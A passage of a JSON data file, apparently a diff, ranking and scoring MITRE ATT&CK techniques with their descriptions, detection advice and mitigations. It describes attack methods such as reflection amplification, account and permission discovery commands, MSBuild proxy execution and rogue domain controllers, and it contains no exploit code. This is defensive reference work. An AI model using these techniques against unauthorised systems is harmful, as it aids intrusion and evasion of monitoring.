such as Windows Management Instrumentation and PowerShell.", + "score": 0.6005971076285714, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1518.001", + "name": "Software Discovery: Security Software Discovery", + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nExample commands that can be used to obtain security software information are netsh, reg query with Reg, dir with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)", + "url": "https://attack.mitre.org/techniques/T1518/001", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.", + "mitigations": [] + } + ] + }, + { + "rank": 115, + "tid": "T1498", + "name": "Network Denial of Service", + "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\nFor DoS attacks targeting the hosting system directly, see Endpoint Denial of Service.", + "url": "https://attack.mitre.org/techniques/T1498", + "detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "score": 0.5968142857142857, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "subtechniques": [ + { + "tid": "T1498.001", + "name": "Network Denial of Service: Direct Network Flood", + "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. Direct Network Flood are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)", + "url": "https://attack.mitre.org/techniques/T1498/001", + "detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1498.002", + "name": "Network Denial of Service: Reflection Amplification", + "description": "Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)", + "url": "https://attack.mitre.org/techniques/T1498/002", + "detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + } + ] + }, + { + "rank": 116, + "tid": "T1535", + "name": "Unused/Unsupported Cloud Regions", + "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through Resource Hijacking, which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)", + "url": "https://attack.mitre.org/techniques/T1535", + "detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)", + "score": 0.5882571428571428, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "subtechniques": [] + }, + { + "rank": 117, + "tid": "T1069", + "name": "Permission Groups Discovery", + "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.", + "url": "https://attack.mitre.org/techniques/T1069", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)", + "score": 0.5748529325038096, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1069.001", + "name": "Permission Groups Discovery: Local Groups", + "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\nCommands such as net localgroup of the Net utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups.", + "url": "https://attack.mitre.org/techniques/T1069/001", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "mitigations": [] + }, + { + "tid": "T1069.002", + "name": "Permission Groups Discovery: Domain Groups", + "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\nCommands such as net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.", + "url": "https://attack.mitre.org/techniques/T1069/002", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "mitigations": [] + }, + { + "tid": "T1069.003", + "name": "Permission Groups Discovery: Cloud Groups", + "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.", + "url": "https://attack.mitre.org/techniques/T1069/003", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.", + "mitigations": [] + } + ] + }, + { + "rank": 118, + "tid": "T1087", + "name": "Account Discovery", + "description": "Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.", + "url": "https://attack.mitre.org/techniques/T1087", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", + "score": 0.5710958066666667, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ], + "subtechniques": [ + { + "tid": "T1087.001", + "name": "Account Discovery: Local Account", + "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\nCommands such as net user and net localgroup of the Net utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.", + "url": "https://attack.mitre.org/techniques/T1087/001", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1087.002", + "name": "Account Discovery: Domain Account", + "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.\nCommands such as net user /domain and net group /domain of the Net utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups.", + "url": "https://attack.mitre.org/techniques/T1087/002", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1087.003", + "name": "Account Discovery: Email Account", + "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)\nIn on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)", + "url": "https://attack.mitre.org/techniques/T1087/003", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "mitigations": [] + }, + { + "tid": "T1087.004", + "name": "Account Discovery: Cloud Account", + "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)", + "url": "https://attack.mitre.org/techniques/T1087/004", + "detection": "Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 119, + "tid": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.", + "url": "https://attack.mitre.org/techniques/T1127", + "detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", + "score": 0.5647685585714286, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ], + "subtechniques": [ + { + "tid": "T1127.001", + "name": "Trusted Developer Utilities Proxy Execution: MSBuild", + "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)", + "url": "https://attack.mitre.org/techniques/T1127/001", + "detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + } + ] + }, + { + "rank": 120, + "tid": "T1123", + "name": "Audio Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.", + "url": "https://attack.mitre.org/techniques/T1123", + "detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.", + "score": 0.5540285714285714, + "network_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 121, + "tid": "T1083", + "name": "File and Directory Discovery", + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Native API.", + "url": "https://attack.mitre.org/techniques/T1083", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.5513216428571429, + "network_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 122, + "tid": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "description": "Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\nOne such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)", + "url": "https://attack.mitre.org/techniques/T1140", + "detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as certutil.\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.", + "score": 0.544029160952381, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 123, + "tid": "T1525", + "name": "Implant Internal Image", + "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike Upload Malware, this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\nA tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a Web Shell.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)", + "url": "https://attack.mitre.org/techniques/T1525", + "detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.\nIn containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. ", + "score": 0.542984062857143, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [] + }, + { + "rank": 124, + "tid": "T1111", + "name": "Two-Factor Authentication Interception", + "description": "Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)", + "url": "https://attack.mitre.org/techniques/T1111", + "detection": "Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.\nSimilar to Input Capture, keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.", + "score": 0.5404761904761906, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "subtechniques": [] + }, + { + "rank": 125, + "tid": "T1113", + "name": "Screen Capture", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)", + "url": "https://attack.mitre.org/techniques/T1113", + "detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.", + "score": 0.5399419085714285, + "process_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 126, + "tid": "T1207", + "name": "Rogue Domain Controller", + "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)", + "url": "https://attack.mitre.org/techniques/T1207", + "detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub 